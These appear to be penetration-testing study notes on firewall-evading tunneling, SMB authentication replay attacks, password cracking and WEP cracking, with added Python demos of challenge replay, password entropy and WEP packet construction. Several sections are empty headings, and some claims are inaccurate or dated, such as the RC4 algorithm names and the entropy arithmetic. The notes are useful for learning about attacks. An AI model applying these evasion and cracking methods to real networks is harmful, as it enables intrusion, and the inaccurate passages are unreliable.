In this example there is a middle man (the proxy) which redirects all the traffic. This helps the attacker
communicate with the victim because the firewall blocks all traffic on X but not on Y.
This also can help to protect your anonymity.


HTTP CONNECT Tunneling


HTTP CONNECT has a wonderful feature where we can tunnel traffic over HTTP to a specific port. This
uses a server as a proxy to reach the internet.
All we do is netcat into an HTTP CONNECT server and type the following request line:
CONNECT [server]:[port] HTTP/1.0

SSL Tunneling
SSL Tunneling is a technique to add SSL functionality to programs or protocols that normally don't
have SSL. This is useful when in an environment that might have certain SSL ports blocked, or when you
need secure communication between protocols that have no encryption. However, the accepting party must
have SSL enabled on their server or it will just drop the SSL traffic. This can be done by either setting
SSL up for a specific protocol or setting stunnel in server mode.

stunnel
stunnel - A free port forwarding tool. It is used as a wrapper to encrypt incoming and outgoing
network traffic using SSL.
Stunnel also lets us bypass firewalls and IDSs since the traffic is encrypted and we can send it through
a legitimate SSL port such as 443.
Stunnel's configuration file is located in /etc/stunnel/stunnel.conf.
Once we have edited the configuration file, we can start stunnel using
stunnel4

Be sure you have a certificate file and that it is pointed to in the stunnel configuration file.

SOCKS
SOCKS is a proxy server that allows all port traffic through, allowing for a more comprehensive sense
of anonymity.

SSH Tunneling
SSH Tunneling - A tunneling protocol that connects to a computer using SSH and then redirects traffic
from the SSH session to a port. Since the client is not only the client but also the middleman, it makes
things much faster.

Local
Local SSH port forwarding redirects traffic from a port on the client through the SSH session to a port
on the SSH server.
ssh -L [local-port]:localhost:[server-port] [host]

With a local-port of 8080 and a server-port of 80, this redirects port 8080 on the client to the server's
port 80.

Remote
Remote port forwarding lets the SSH server reach a port on your machine through the tunnel.
ssh -R [remote-port]:localhost:[local-port] [host]

With a remote-port of 5900, this would let the host connect to your local port through the SSH tunnel by
pointing his client to localhost:5900.

Dynamic
This lets us forward all traffic through SOCKS and is a wonderful solution for complete network
security.
ssh -C -D [port] [host]

With this we can easily set up most clients to use the proxy settings and be allowed full anonymity.

Tor
Tor - A system of proxies acting as nodes to protect anonymity and information. All the data is
encrypted over Tor and it provides good route security.

Theory
Tor works by using not just one proxy but many in a route sequence. Tor uses a large number of nodes.
For every connection a random route is chosen, ensuring that anonymity is kept.

Installing

Using

Authentication Vulnerabilities
Theory
Authentication mechanisms are something that must be treated with the utmost security and
cautiousness. However, some technologies still used today have extremely weak authentication systems
in place. Often, some services send data completely in plain-text.

Problems With Networks


The big issue with networks is that someone can insert themselves in between a client and a server,
allowing them to hear all traffic between them. Despite this there are secure ways of exchanging
information even if a third party is listening.

Plain Text
This is the most vulnerable to attack. Usernames and passwords are sent in plain-text, allowing anyone
to listen in. While this is the easiest to implement, this is the least secure.
FTP, POP, SMTP, and HTTP all use clear text systems.

Hashing Systems
Hashing systems involve encrypting a password one way. This means that I can turn a password into a
hash but I can't get the password back if I only have the hash. This adds a layer of security but is a
flawed methodology. Since the hash is as good as the password itself, one only needs to obtain the hash
to compromise a user account.
SMB uses a hash system.

MD4

DES

MD5

SHA1

NTLM

MYSQL

Challenge Systems
Challenge systems take a better step in the right direction; however, they can be flawed, as we will see
in the Here Be Dragons section. Challenge systems build upon the hash system. When a computer comes to
connect to a server, the server asks for the password and gives the client a challenge. This challenge can
be any length but, for the sake of pacing, it will be only 4 characters long. So the server gives the
client the challenge 4444. The client then takes the password hash and one-way encrypts it again, now
using the challenge. The client sends the challenge/hash text back and the server compares the
encrypted hashes. Challenges are randomly created at the time of connection.
Basically, the third party only gets the challenge and the encrypted hash. Since the encryption is one
way, they can't do much with it. This also breaks most brute-force, dictionary and rainbow table attacks,
as the client now has much more to do than just sending the password: he has to hash the password and
then encrypt it using a challenge. This boosts the instruction count, making it take much longer.
Common ways around this are to force a client to connect to you and send them the insecure challenge
1234. People have written tools and crackers based around this insecure hash and, as a result, one can
often guess the password.
SMBv2 uses a challenge response system.

Uneven Algorithms
Uneven algorithms are the hardest to break and involve a high amount of security. This involves
creating two sets of keys, a public and a private key. The public key is given to the client while the
private key is kept for oneself. The public key is used to encrypt data, while the private key is used to
decrypt it.
The only thing the attacker can gain is the public key, which can only encrypt data, therefore being
worthless to the attacker.
SSH uses uneven algorithms to encrypt data.

Here Be Dragons
This section is about mistakes made in the industry over the years but mostly criticizes Micro$oft.
Back in 2008 Microsoft released a patch for a vulnerability called the SMB credential reflection attack.
The attack was made popular by the Metasploit module written to leverage the vulnerability. Since SMB
uses a hashing system, the hash is as good as the plain-text password. As a result, someone found that
you could trick a computer into giving up the username and password hash of a victim. The attack
worked by referencing an SMB share in a webpage by way of <IMG> tags. When the victim loaded this
webpage, the computer attempted to access the share by first trying the user's name and password. All
the server had to do was reflect that information back and it would have access to the user's account. A
patch was eventually released.
Later, in 2011, a person on exploit-db came forward with an attack aimed at SMBv2. This vulnerability
leveraged the way SMBv2 handles challenges. The challenges weren't truly random and, as a result, an
attacker could use this to gain access to the system.
How it works is, an attacker first attempts a connection to an SMB server. The server offers it a
challenge, which the attacker stores. It then makes a new connection and gets a new challenge. It repeats
this until it has around 8000 challenges. Then the victim opens their web browser and is sent to a
webpage with a refreshing JavaScript image linked to the attacker's SMB share. When the victim connects,
the attacker's server offers it a challenge it collected previously. It does this until it has collected all
the challenge/encrypted hash combinations. Then the attacker connects back to the victim and keeps
reconnecting until it gets a challenge it knows the answer to. It then replays the hash and gains access.
This was a huge mistake on Micro$oft's part, as twice their default service has had huge gaping
authentication holes that were leveraged in very similar ways.
The moral here is to figure out what the problem really is. The problem here wasn't necessarily the
authentication system but the fact that images could be linked to SMB shares in HTML. Microsoft
could have easily disabled this, as no one uses this feature. Instead they beefed up security but
ultimately left this huge gaping hole, and they paid for it.
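The property both the Challenge Systems passage and the SMBv2 story above turn on, as an added example that is not from these notes: a toy challenge/response exchange in which the server keeps a password hash and the client answers with that hash one-way mixed with the challenge (HMAC-SHA256 here; the real SMB message formats are not reproduced). A server that issues fresh random, single-use challenges defeats a replayed recording; one that reuses a fixed challenge, like the page's 1234, does not. The demo password, connection ids and class names are constructed.

```python
import hashlib
import hmac
import os

# Stored verifier on the server, modelled on the page: the password is kept as
# a hash, and a response is that hash one-way mixed with the challenge.
PASSWORD_HASH = hashlib.sha256(b"constructed-demo-password").digest()


def compute_response(pw_hash, challenge):
    return hmac.new(pw_hash, challenge, hashlib.sha256).digest()


class Server:
    def __init__(self, random_challenges=True):
        self.random_challenges = random_challenges
        self.fixed_challenge = b"1234"      # the page's "insecure challenge 1234"
        self.outstanding = {}               # connection id -> challenge issued

    def connect(self, conn_id):
        # A fresh random value per connection is the whole point of the scheme;
        # the fixed value models the predictable-challenge flaw the page describes.
        c = os.urandom(8) if self.random_challenges else self.fixed_challenge
        self.outstanding[conn_id] = c
        return c

    def authenticate(self, conn_id, response):
        c = self.outstanding.pop(conn_id, None)   # single use, then forgotten
        if c is None:
            return False
        return hmac.compare_digest(response, compute_response(PASSWORD_HASH, c))


def legitimate_login(server, conn_id):
    # Honest client. Anyone listening on the wire sees (challenge, response),
    # which is all the eavesdropper in the page's model gets.
    challenge = server.connect(conn_id)
    response = compute_response(PASSWORD_HASH, challenge)
    ok = server.authenticate(conn_id, response)
    return ok, (challenge, response)


def replay(server, recorded_pairs):
    # Someone without the password replays a recorded response. This can only
    # succeed if the server hands out a challenge it has already used.
    challenge = server.connect("replayer")
    known = dict(recorded_pairs)
    if challenge not in known:
        return False
    return server.authenticate("replayer", known[challenge])


def demo(random_challenges):
    # One observed honest login, then one replay attempt against the same server.
    server = Server(random_challenges)
    ok, pair = legitimate_login(server, "victim")
    assert ok
    return replay(server, [pair])


if __name__ == "__main__":
    print("fixed challenge, replay succeeds :", demo(random_challenges=False))
    print("random challenge, replay succeeds:", demo(random_challenges=True))
```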

Password Attacks
Passwords are one of the weaker links in the security chain, and often times, we must add huge
amounts of security to password systems to ensure there are protections for users. Most breaches are of
those involving passwords, since humans will often use the same weak password for every account
they own, allowing an attacker to breach all of their online accounts.

Theory
Password attacks often involve a form of password guessing, either online or offline. Some users can
be easily profiled for their passwords, making this significantly easier. Others may have passwords that
can't be profiled but, easily guessed or, compromised in a different fashion. Others might have secure
passwords but, are still vulnerable to guessing attacks or, the password hash is easily available,
allowing an offline attack. As a result, password systems can often be defeated if simple systems aren't
put in place to mitigate attacks.

Strong Vs. Weak Passwords


Weak passwords often have many associated weaknesses that can make them easily guessed.
Weak passwords often:
- are a single word
- are less than 10 characters
- use only one character set (Ex: A-Z only)
These characteristics make them easily guessed and dangerous.

A strong password usually has these characteristics:
- multiple words
- more than 10 characters
- more than one character set (Ex: a-z, A-Z, 1-9, symbols)
Some examples of weak and strong passwords:

Weak          Strong
easy          N0ts034sy!
weakpassword  5T0n9P4$$w0rD**

Brute Force
Brute-forcing is a password attack that guesses the password by starting at a base and adding one
position to the password until it gets the right one. These attacks can take a while, especially when
passwords have a high character count.
This attack can be done both online and offline. However, it is most suitable for online use, as there
are better and faster ways to get a password in an offline situation.
Ways to mitigate this are either to make a large instruction set for sending the password, such as having
to encrypt the password using a Caesar cipher according to the current server date, which ups the
instruction count and makes it take longer, or to implement a lockout of the service when a certain
number of tries is used. Linux handles this by making it so the hashes can only be compared every 5
seconds, so when a password is guessed wrong, they can't compare again until the time limit is up.

Dictionary
Dictionary attacks are done using a wordlist, which is a giant list of possible passwords. The attacker
goes through each entry in the list and attempts to find a valid password. The wordlist can be any size;
however, they often contain only dictionary words and common passwords.
This attack can be done both online and offline. It is suitable for both; however, it has a low yield,
since the password might not be on the list.
You can mitigate this attack with most of the techniques in the brute-force section.

Rainbow Tables
Rainbow tables are an offline-only attack that is considered the best solution for offline attacks. It
involves creating a giant list of all possible hash/plaintext password pairs for a given set, such as the
characters a-z, A-Z, 1-9, 0 and symbols, for lengths 1-10. This could crack just about any password in
our set up to 10 characters.
Brute-force and dictionary attacks both cost a lot CPU-wise; rainbow tables relieve some of the load but
take up a lot of space on disk. The table mentioned above would be roughly 250GB-500GB in size.
Rainbow tables take a long time to generate and, as a result, most are paid for. However, there is a
group that makes them for free by using the community as a giant cluster.

GPU Cracking


Misconceptions
In all actuality, the guidelines I gave earlier for strong passwords are a little off. The truth is that the
passwords I listed as strong passwords aren't so strong but, in the scheme of things, can be OK for some
applications.
Consider this character set which we will call the Strong Character Set (SCS):
a-z, A-Z, 1-0, symbols(!@#$%^&*()-+_=?)

The total amount of characters in the set:


a-z = 26
A-Z = 26
1-0 = 10
symbols = 15
Total: 77

Now consider a character set aptly named the Weak Character Set (WCS):
a-z,1-0

The total number of characters in the set


a-z = 26
1-0 = 10
Total: 36

First off, we will make a password fitting the guidelines of the first section and drawn from the
character set SCS: M0un741n5**.
First, the cons of this password. It's difficult to remember. It draws on a huge character set and a lot of
confusing symbols. In fact, I'm willing to bet that most people won't be able to remember whether the o in
the password was a 0 or an o. However, let's take a look at how long it would take to crack a password
built on these guidelines, brute-force style.
M0un741n5**
Chars: 11
Character set length: 77
Entropy of each character: We will assume 2
Total bits of entropy: ~28 (I made a pretty generous addition in its favor)
Amount of guesses needed: 2^22
Time needed to crack: About 3.1 days at 1000 guesses a second.

Now let's make a password using the WCS, but with a higher character count, which allows us to make a
more secure password.
First, let's take a phrase, remove all the spaces, and then tack the number of words in it onto the end;
for this example it will be thispasswordseemsunsecure4.

thispasswordseemsunsecure4
Chars: 26
Character set length: 36
Entropy of each character: we will assume 1.5
Total bits of entropy: ~54
Number of guesses needed: 2^54
Time needed to crack: so long that I couldn't even calculate the time.

This password is easy to remember and hard for computers to guess.


XKCD made a joke about this in a comic; the punchline says: Over the past 20 years, we've taught
people to use passwords that are hard for humans to remember and easy for computers to guess.
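The arithmetic behind the two comparisons above is worth having as a reusable calculation. The following is an added example, not code from the original document: it computes the full keyspace in bits (length times log2 of the character-set size), the text's flat per-character estimate, and the days needed to exhaust 2^bits guesses at a given rate. Because the text rounds its totals to ~28 and ~54 bits, crack_time_days takes the bit count directly; passing 28 bits at 1000 guesses a second reproduces its 3.1 days. The 10^9 guesses-per-second figure used in the demo is a constructed illustration of a faster cracker, not a number from the text.

```python
import math

SECONDS_PER_DAY = 86_400


def keyspace_bits(length: int, charset_size: int) -> float:
    """Bits of search space if every character were drawn uniformly from the set."""
    return length * math.log2(charset_size)


def assumed_bits(length: int, bits_per_char: float) -> float:
    """The text's shortcut: a flat per-character entropy estimate that discounts
    for human-chosen characters being far from uniform."""
    return length * bits_per_char


def crack_time_days(bits: float, guesses_per_second: float) -> float:
    """Days to exhaust a search space of 2^bits at a given guess rate (worst case;
    on average the password is found in half that time)."""
    return 2.0 ** bits / guesses_per_second / SECONDS_PER_DAY


def report(password: str, charset_size: int, bits: float, rate: float = 1000.0) -> dict:
    """Summarise one password under the text's assumptions and the full keyspace."""
    return {
        "password": password,
        "chars": len(password),
        "keyspace_bits": round(keyspace_bits(len(password), charset_size), 1),
        "assumed_bits": bits,
        "days_at_rate": crack_time_days(bits, rate),
    }


if __name__ == "__main__":
    # (password, character-set size, bits the text assigns) for the two examples
    cases = [("M0un741n5**", 77, 28), ("thispasswordseemsunsecure4", 36, 54)]
    for rate in (1e3, 1e9):   # 1e9/s is a constructed figure for a fast cracker
        for pw, charset, bits in cases:
            r = report(pw, charset, bits, rate)
            print(f"{pw:28} {r['keyspace_bits']:6.1f} keyspace bits, "
                  f"{bits} assumed bits: {r['days_at_rate']:.3g} days at {rate:g}/s")
```

The full-keyspace figures (about 69 bits for the 11-character SCS password and about 134 bits for the 26-character WCS one) show where the length advantage comes from: every added character multiplies the search space by the set size, so a longer password over a smaller set quickly overtakes a short one over a larger set.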

hydra

xhydra

medusa

ncrack

Wireless Attacks
Theory
Attacks on wireless networks have become extremely popular in the last couple of years, owing to the
widespread adoption of wireless and its lax security standards. The biggest issue is that, unlike on a wired
network, it is easy to listen in on all communication between a client and an access point.

WEP
Wired Equivalent Privacy, or WEP, was the first wireless privacy standard to be released. Early on,
many white-hat researchers wrote papers detailing WEP's huge, gaping flaws; however, their security
concerns were ultimately ignored. WEP still remains the most popular wireless security standard
despite being hard to use, having cryptic keys, and being easily broken.

WEP can have multiple keys; however, this does not make the access point more secure.
WEP works by encrypting traffic with RC4, a symmetric cipher, using the WEP key.
The frame body contains an initialization vector (IV), the encrypted data, and an integrity check value
(ICV), which is an encrypted checksum. The IV is 3 bytes and the ICV is 4 bytes in length.
IVs are generated randomly and prepended to the packet. IVs act as a cryptographic salt and are also
used in packet generation: during packet generation, the IV is prepended to the WEP key and the result
is fed to the RC4 algorithm.
The RC4 algorithm is made up of two processes, a Key Sharing Algorithm (KSA) and a Pseudo-Random
Generation Algorithm (PRGA).
Next, an ICV is computed over the data so that it can be checked for integrity, and the ICV is appended
to the data. This concatenation is then XORed with the RC4 keystream produced from the IV/WEP key
combination. Afterwards, the IV is again prepended to the encrypted data.
The finalized packet looks like this:

    +---------------+------------------------------+
    | Not Encrypted |          Encrypted           |
    +---------------+-------------+----------------+
    | IV (3 bytes)  | Data        | ICV (4 bytes)  |
    +---------------+-------------+----------------+
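The packet construction just described can be reproduced end to end in a few dozen lines. The following is an added example, not code from the original document or from any WEP implementation: it implements RC4 (the KSA and PRGA the text names), computes the ICV as a CRC-32 over the plaintext, XORs data||ICV with the keystream derived from IV||key, and prepends the clear-text IV, giving exactly the layout in the table above. The receiver side re-derives the keystream from the IV and checks the ICV. The sample key, IV and payload are constructed; the layout omits the one-byte key-index field a real 802.11 frame carries after the IV, to match the text. A final helper computes, from the birthday bound, how few frames it takes before a random 24-bit IV repeats, which is the reason IV reuse is WEP's central weakness.

```python
import math
import os
import struct
import zlib


def rc4_ksa(key: bytes) -> list:
    """Key-scheduling algorithm: permute the 256-byte state under the key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Pseudo-random generation algorithm: emit `length` keystream bytes."""
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key: bytes, data: bytes, iv: bytes = None) -> bytes:
    """Build the frame body from the text: IV || RC4(IV || key) XOR (data || ICV).
    The real frame also carries a key-index byte after the IV; omitted here."""
    if iv is None:
        iv = os.urandom(3)                      # 24-bit IV, fresh per frame
    if len(iv) != 3:
        raise ValueError("WEP IV must be 3 bytes")
    icv = struct.pack("<I", zlib.crc32(data))   # ICV = CRC-32 of the plaintext
    plaintext = data + icv
    keystream = rc4_keystream(iv + wep_key, len(plaintext))
    return iv + xor_bytes(plaintext, keystream)


def wep_decrypt(wep_key: bytes, frame: bytes):
    """Return (data, icv_ok). The receiver rebuilds the keystream from the clear IV."""
    iv, body = frame[:3], frame[3:]
    plaintext = xor_bytes(body, rc4_keystream(iv + wep_key, len(body)))
    data, icv = plaintext[:-4], plaintext[-4:]
    return data, icv == struct.pack("<I", zlib.crc32(data))


def iv_collision_frames(probability: float = 0.5) -> float:
    """Frames after which a randomly chosen 24-bit IV has repeated with the given
    probability (birthday bound). A repeated IV means a repeated RC4 keystream."""
    n = 2 ** 24
    return math.sqrt(2 * n * math.log(1 / (1 - probability)))


if __name__ == "__main__":
    key = b"\x01\x02\x03\x04\x05"               # constructed 40-bit WEP key
    frame = wep_encrypt(key, b"hello, wep", iv=b"\xaa\xbb\xcc")
    print("frame:", frame.hex())
    print("decrypted:", wep_decrypt(key, frame))
    print(f"50% chance of an IV repeat after ~{iv_collision_frames():.0f} frames")
```

Two things the code makes concrete: the ICV is a plain CRC-32 that is encrypted only by being XORed with the same keystream as the data, and with only 2^24 possible IVs a busy access point is expected to repeat one after a few thousand frames, at which point two frames share a keystream.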

WEP Cracking
Cafe Latte
Cafe Latte is an attack that was mainly performed in coffee shops, but it can be performed anywhere
there is a computer attempting to reach a wireless network that is no longer in range. The attack relies
on the computer broadcasting that it is looking for a specific network. An attacker can pretend to be
that network and obtain the wireless password.

ARP Replay

Korek's Chop Chop Attack


Korek's Chop Chop attack allows the decryption of packets thanks to a flaw in packet validation on the
AP's part.
The attack works by first obtaining an encrypted packet. The packet is split into three parts: the IV, the
encrypted data, and the ICV. The attacker then chops off the last byte, sets that byte to 00, and
recalculates the ICV using a special method Korek invented.
Once the ICV is recalculated, the packet is sent back to the AP. If the byte was right, the AP will accept
it; if not, the AP will tell the attacker the packet was wrong. The attacker then increments the 00 byte
and resubmits, repeating until it gets a correct response. It then moves on to the next byte, doing the
procedure over and over until it has fully decrypted the packet.

The attack manages to guess each byte within 128 tries, since the most it can take is 256. This attack can
eventually yield a password, if done correctly.

Hirte Attack

Fragmentation Attack

WPA

WPA Cracking

WPA2

WPA2 Cracking

DoS Attacks
Deauthentication Attacks

Man In The Middle


The wireless man-in-the-middle attack abuses the trust computers place in wireless access points. The
attack relies on the fact that a computer will auto-connect to an access point that it already knows
and that has the closest (strongest) signal.

Social Engineering
